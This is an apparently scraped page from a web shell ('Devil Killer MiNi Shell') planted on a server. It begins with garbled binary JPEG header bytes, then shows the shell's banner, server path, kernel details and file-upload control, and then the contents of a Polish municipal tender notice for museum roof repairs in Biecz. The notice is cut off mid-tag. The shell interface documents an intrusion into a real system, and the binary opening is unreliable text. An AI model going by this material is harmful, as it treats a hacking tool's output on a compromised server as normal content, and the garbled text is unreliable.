JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240703/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240703/0039414701-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Modernizacja infrastruktury kulturalno - edukacyjnej na terenie<br/> Gminy Biecz. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Biecz</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Zespół ds. zamówień publicznych</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 370440614</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Rynek 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Biecz</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">38-340</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL218 - Nowosądecki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">um@biecz.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.biecz.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Modernizacja infrastruktury kulturalno - edukacyjnej na terenie<br/> Gminy Biecz. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-874c54d4-3909-11ef-880f-0e435a8a43bc</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00394147</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-07-03</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00060396/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Modernizacja infrastruktury kulturalno – edukacyjnej na terenie Gminy Biecz</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/949360 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu Platformy Zakupowej https://www.platformazakupowa.pl/pn/biecz</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu Platformy Zakupowej:<br/>https://www.platformazakupowa.pl/pn/biecz<br/>2. Postępowanie prowadzone jest w języku polskim na Platformie w zakładce „POSTĘPOWANIA” pod „NAZWĄ” zgodną z nazwą<br/>prowadzonego postępowania.<br/>3. W razie wystąpienia awarii uniemożliwiającej wykorzystanie Platformy jako środka komunikacji, Zam. może również komunikować<br/>się z Wyk. za pomocą poczty elektronicznej e-mail: zamowienia@biecz.pl - nie dotyczy składania ofert.<br/>4. Korzystanie z Platformy przez Wykonawców jest bezpłatne.<br/>5. Wykonawca przystępując do niniejszego postępowania o udz. Zam. publ., akceptuje warunki korzystania z Platformy określone w<br/>„Regulaminie” zamieszczonym na str. internetowej pod adresem: https://platformazakupowa.pl/strona/1-regulamin oraz uznaje go za<br/>wiążący.<br/>6. Zamawiający inf., że instrukcje korzystania z Platformy dotyczące w szczególności logowania, pobrania dok., składania wniosków<br/>o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym post. przy użyciu Platformy znajdują<br/>się w zakładce „Instrukcje dla Wykonawców&#34; na str. internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje<br/>7. Wymagania techniczne i organizacyjne wysyłania i odbierania dok. elektronicznych, elektronicznych kopii dok. i oświadczeń oraz<br/>inf. przekazywanych przy ich użyciu opisane zostały w „Regulaminie” oraz „Instrukcjach dla Wykonawców&#34; zamieszczonych na<br/>stronie internetowej pod adresem https://platformazakupowa.pl/strona/1-regulamin oraz https://platformazakupowa.pl/strona/45-<br/>instrukcje W przypadku rozbieżności pomiędzy treścią regulaminu i instrukcji, o których mowa wyżej, a treścią SWZ zastosowanie<br/>mają zapisy SWZ.<br/>8. Za datę złożenia wniosków, zawiadomień, dok. elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub<br/>oświadczeń oraz innych informacji przyjmuje się datę ich wczytania do Platformy.<br/>9. Komunikacja między Zam. a Wyk., w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje (nie dotyczy oferty i<br/>dokumentów składanych równocześnie z ofertą) przekazywane są w postaci elektronicznej za pośrednictwem Platformy i formularza<br/>„Wyślij wiadomość”. Za datę złożenia oświadczeń, wniosków, zawiadomień oraz inf. przyjmuje się datę ich przesłania za<br/>pośrednictwem Platformy poprzez kliknięcie przycisku „Wyślij wiadomość” po którym pojawi się komunikat, że wiadomość została<br/>wysłana do Zamawiającego.<br/>10. Zalecenia Zamawiającego odnośnie formatów kwalifikowanego podpisu elektronicznego:<br/>- dla dokumentów z rozszerzeniem .pdf zaleca się podpis w formacie PadES,<br/>- dla dokumentów z rozszerzeniem innym niż .pdf zaleca się podpis w formacie XadES<br/>11. Zamawiający dopuszcza przesyłanie danych w formatach dopuszczonych odpowiednimi przepisami prawa, tj. m.in.: .doc, .docx,<br/>.xls, .xlsx, .pdf, .zip, przy czym zaleca się wykorzystywanie plików w formacie .pdf.<br/>12. Informacja na temat kodowania i czasu odbioru danych:<br/>- pliki Oferty załączone przez Wykonawcę na Platformie i zapisane, widoczne są w Platformie jako zaszyfrowane. Możliwość<br/>otworzenia plików dostępna jest dopiero po odszyfrowaniu przez Zam. po upływie terminu otwarcia ofert,<br/>- oznaczenie czasu odbioru danych przez Platformę stanowi przypiętą do dok. elektronicznego datę oraz dokładny czas (hh:mm:ss).<br/>13. Sposób sporządzenia dok. elektronicznych, oświadczeń lub elektronicznych kopii dok. lub oświadczeń musi być zgodny z<br/>wymaganiami określonymi w Rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i<br/>przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w post. o udzielenie zamówienia publicznego lub konkursie oraz Rozporządzeniu Ministra Rozwoju, Pracy i technologii z dnia 23<br/>grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać<br/>zamawiający od wykonawcy.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlament u Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>a) administratorem Pani/Pana danych osobowych jest GMINA BIECZ reprezentowana przez Burmistrza Biecza z siedzibą w Bieczu, ul. Rynek 1, 38-340 Biecz, um@biecz.pl,<br/>b) Administrator danych osobowych powołał inspektora ochrony danych w Gminie Biecz, z którym można skontaktować się za pośrednictwem telefonu pod nr 13 4406819 lub poczty elektronicznej na adres: iodo@biecz.pl lub listownie poprzez wysłanie listu na podany powyżej adres administratora danych, umieszczając dopisek „Do Inspektora ochrony danych”;<br/>c) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z niniejszym postępowaniem;<br/>d) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy, inne podmioty uprawnione na podstawie przepisów prawa, a także podmioty, którym na podstawie zawartej umowy powierzono przetwarzanie danych osobowych;<br/>e) Administrator nie zamierza przekazywać Pani/Pana danych osobowych do państwa trzeciego oraz organizacji międzynarodowej;<br/>f) okres przechowywania przez administratora Pani/Pana danych osobowych uzależniony jest od przepisów ustawy Pzp (zgodnie z art. 74 ust. 1 i ust. 4 ustawy protokół postępowania wraz z załącznikami przechowywany jest przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy) oraz nadanej jej kategorii archiwalnej, zgodnej z jednolitym rzeczowym wykazem akt określonym przepisem prawa. Pani/Pana dane osobowe mogą być jednak przechowywane dłużej ze względu na to, że materiały będące we władaniu administracji publicznej mogą być usunięte tylko na podstawie zgody archiwum państwowego;<br/>g) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy. Jednocześnie podanie Burmistrzowi Biecza danych osobowych umożliwiających Pani/Pana identyfikację jest niezbędne do wykonania zadania realizowanego w interesie publicznym lub w ramach sprawowania władzy publicznej powierzonej Burmistrzowi Biecza;<br/>h) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>i) posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych**;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania<br/>danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO***;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna<br/>Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy<br/>RODO;<br/>j) nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych,<br/>gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c oraz e RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.22.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest wykonanie robót budowlanych dla zadania inwestycyjnego pn. Modernizacja infrastruktury kulturalno - edukacyjnej na terenie Gminy Biecz, Część I - Remont i renowacja dachu Domu z Basztą – Etap II.<br/>2. Zadanie realizowane w ramach Rządowego funduszu Polski Ład: Program Inwestycji Strategicznych nr Edycja8/2023/5745/PolskiLad na podstawie wstępnej promesy z dnia 25.07.2023 r.<br/>3. Zakres prac- Realizacja robót budowlanych w etapie objętym niniejszym zamówieniem dotyczy naprawy pokrycia dachu wraz z wykonaniem powłoki bezszwowej budynku Muzeum Ziemi Bieckiej – Dom z Basztą. <br/>Zakres prac obejmuje w szczególności:<br/>- zdemontowanie instalacji odgromowej i odladzającej<br/>- podklejenie i uszczelnienie odspojeń i pęcherzy<br/>- wymiana wyłazu dachowego<br/>- wykonanie nowej nawierzchni<br/>4. Zadanie należy zrealizować zgodnie z załączonym projektem architektoniczno – budowlanym oraz programem prac konserwatorskich zawierającym szczegółowy zakres oraz sposób przeprowadzenia prac. Dokumentacja została zatwierdzona pozwoleniem konserwatorskim nr 268/2022 z dnia 25.11.2022 r. znak DNS-II.5142.38.2022.RK1. oraz pozwoleniem na budowę nr 634/2023 z dnia 17.11.2023 znak AB.6740.748.2023. <br/>Wykonawca zobowiązany będzie do zapewnienia szczególnej organizacji pracy gdyż prace będące przedmiotem zamówienia realizowane będą podczas funkcjonowania Muzeum oraz obok ruchliwej drogi publicznej. Wykonawca zobowiązany jest do odpowiedniego zabezpieczenia miejsc objętych robotami budowlanymi i pracami konserwatorskimi, celem umożliwienia funkcjonowania obiektu zgodnie z jego przeznaczeniem, z uwzględnieniem ciągłości funkcjonowania systemu p.poż oraz monitoringu wizyjnego i alarmowego obiektu w szczególności zabezpieczenia zdrowia i życia osób przebywających wokół wydzielonego terenu prowadzenia prac a także mienia znajdującego się w obiekcie. Prace na dachu prowadzone będą równolegle z pracami objętymi etapem I obejmującym remont attyki od strony frontowej muzeum. Konieczne jest wiec uzgodnienie harmonogramu prac oraz zasad ich prowadzenia z Wykonawcą I etapu. Kierownik budowy ustanowiony w związku z rozpoczęciem prac w zakresie remontu attyki będzie kontynuował swoją funkcję nad pracami objętymi niniejszym zmówieniem na zlecenie Zamawiającego. Wykonawcę na budowie reprezentować będzie wskazany przez niego kierownik robót.<br/><br/>Wykonawca na czas prowadzenia prac zapewni warunki bezpieczeństwa terenu objętego budową (w szczególności: wygrodzenia i zabezpieczenia), utrzymanie terenu budowy w stanie wolnym od przeszkód komunikacyjnych, składowanie w miejscach wyznaczonych wszelkich urządzeń pomocniczych, sprzętu i materiałów. Materiały pochodzące z rozbiórki winny być usuwane na bieżąco z terenu budowy. Termin wykonywania niebezpiecznych, głośnych i/lub uciążliwych prac będzie każdorazowo uzgadniany z Dyrektorem Muzeum. Jeżeli zaistnieje taka konieczność Zamawiający może zażądać wykonywania głośnych i/lub uciążliwych prac po godzinach funkcjonowania obiektu. <br/>Po zakończeniu robót budowalnych i konserwatorskich Wykonawca zobowiązany jest do przekazania Zamawiającemu powykonawczej dokumentacji prac konserwatorskich w 2 egz. papierowych oraz 1 egz. w wersji elektronicznej. <br/>Przedmiot zamówienia obejmuje ponadto:<br/>- Wykonanie w ramach ceny ofertowej wszelkich niezbędnych prac pomocniczych i towarzyszących oraz robót tymczasowych i innych, niezbędnych oraz pominiętych w wycenie i dokumentacji projektowej,<br/>- Roboty składające się na przedmiot zamówienia muszą być wykonane zgodnie z obowiązującymi przepisami (w szczególności ustawy prawo budowlane, ustawą o ochronie zabytków, ustawy prawo ochrony środowiska przepisami bhp i p.poż oraz branżowymi), jak również zgodnie z zasadami wiedzy technicznej, a także z należytą starannością, zachowaniem właściwej organizacji pracy i zapewnieniem dobrej jakości. <br/>- Materiały stosowane przez Wykonawcę podczas realizacji przedmiotu umowy powinny być fabrycznie nowe i odpowiadać, co do jakości, wymogom wyrobów dopuszczonych do obrotu i stosowania w budownictwie, zgodnie z art. 10 ustawy z dnia 7 lipca 1994 roku Prawo budowlane oraz jakościowym i gatunkowym wymaganiom określonym w programie prac konserwatorskich.<br/>- Wszystkie użyte materiały, wyroby oraz urządzenia muszą mieć aktualne dokumenty (atesty, aprobaty<br/> i deklaracje zgodności) dopuszczające do stosowania w budownictwie, zgodnie z przepisami obowiązującymi w tym zakresie i muszą być zgodne z programem prac konserwatorskim. <br/>- Wykonawca robót ponosi odpowiedzialność za jakość wykonywanych robót oraz zastosowanych materiałów. Wszelkie zmiany w tym zakresie będą wymagały konsultacji z projektantem oraz Wojewódzkim Urzędem Ochrony Zabytków w Krakowie Delegatura w Nowym Sączu.<br/>- Na każde żądanie Inspektora Nadzoru, Wykonawca zobowiązany jest okazać, w stosunku do wskazanych materiałów (krajowe deklaracje zgodności), aprobatę techniczną oraz wymagane atesty (kartę charakterystyki), krajową ocenę techniczną wydaną przez upoważnioną instytucję krajową.<br/>- Materiały uznane przez Zamawiającego za posiadające wady lub niezgodne z programem prac konserwatorskich muszą być niezwłocznie usunięte przez Wykonawcę z terenu budowy. Wykonawca nie ma prawa wykonywać robót z użyciem materiałów, które nie zostały zaakceptowane przez Inspektora nadzoru.<br/>- Dodatkowo Wykonawca zobowiązany będzie do posiadania w okresie obowiązywania umowy ważnej polisy lub innego dokumentu ubezpieczenia potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na sumę ubezpieczenia nie mniejszą niż 50% wartości umownej. Kopię dokumentu przedstawi Wykonawca którego oferta zostanie wybrana przed podpisaniem umowy. Wykonawca zobowiązany jest do zapewnienia ciągłości ubezpieczenia w całym okresie realizacji prac. W przypadku zakończenia okresu obowiązywania polisy Wykonawca niezwłocznie przedstawi jej prolongatę.<br/>5. Szczegółowy opis przedmiotu zamówienia dla wszystkich części zawierają odpowiednio:<br/>a)	dokumentacja dla części I, II, III stanowiąca załącznik nr 1 do SWZ oraz dla części III Link: https://platformazakupowa.pl/transakcja/894478 (zał. nr 1 do SWZ),<br/>b)	istotne postanowienia umowy dla części I, II, III załącznik nr 7 do SWZ.<br/><br/>UWAGA! Przedmiary robót, które załączył Zamawiający mają znaczenie orientacyjne i pomocnicze. Wykonawca jest zobowiązany do dokonania własnych ustaleń co do rzeczywistego zakresu prac wymaganego do osiągnięcia rezultatu i dokonania ewentualnych uzupełnień lub zmian. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45113000-2 - Roboty na placu budowy</p> <p class="mb-0">45210000-2 - Roboty budowlane w zakresie budynków</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Ocena ofert zostanie przeprowadzona w oparciu o przedstawione poniżej kryteria oceny ofert tj:<br/>1) CENA (C) – waga 60 % sposób oceny: najniższa - łączna cena brutto za realizację całości zamówienia - maksymalna ilość<br/>punktów 60 pkt., pozostałe proporcjonalnie wg poniższego wyliczenia:<br/>C = Cena oferty najkorzystniejszej/ Cena oferty badanej x 100 x 60 %<br/>2) kryterium okres gwarancji (G) – waga 40 % sposób oceny: oferta spełniająca w najwyższym stopniu wymagania określone w<br/>kryterium „okres gwarancji” otrzyma maksymalną ilość 40 pkt., pozostałe proporcjonalnie, wg poniższego wyliczenia:<br/>Okres gwarancji = Okres gwarancji badanej oferty/ Najwyższy okres gwarancji spośród ofert x 100 x 40%<br/>Wykonawca zobowiązany jest podać w ofercie okres gwarancji jaki udzieli na wykonany przedmiot zamówienia w miesiącach, licząc<br/>od daty odbioru końcowego. Okres gwarancji należy podać w pełnych miesiącach.<br/>Najniższy dopuszczalny okres gwarancji podlegający ocenie: 36 miesięcy,<br/>Najwyższy okres gwarancji podlegający ocenie: 60 miesięcy.<br/><br/>2. Wybór najkorzystniejszej oferty:<br/>Oferta wypełniająca w najwyższym stopniu wymagania określone w powyższych kryteriach otrzyma maksymalną ilość punktów 100<br/>pkt. Pozostałym Wykonawcom, wypełniającym wymagania kryterialne, przypisana zostanie odpowiednio mniejsza (proporcjonalnie<br/>mniejsza) ilość punktów.<br/>Punktacja ogólna zostanie obliczona wg następującego wzoru:<br/>PO = (C + G)<br/>gdzie:<br/>PO = punktacja ogólna,<br/>C = ilość punktów uzyskanych w kryterium – cena<br/>G = ilość punktów uzyskanych w kryterium – okres gwarancji<br/>Za najkorzystniejszą zostanie wybrana oferta, która zgodnie z powyższymi kryteriami oceny ofert uzyska najwyższą liczbę punktów<br/>spośród ofert nie podlegających odrzuceniu.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span 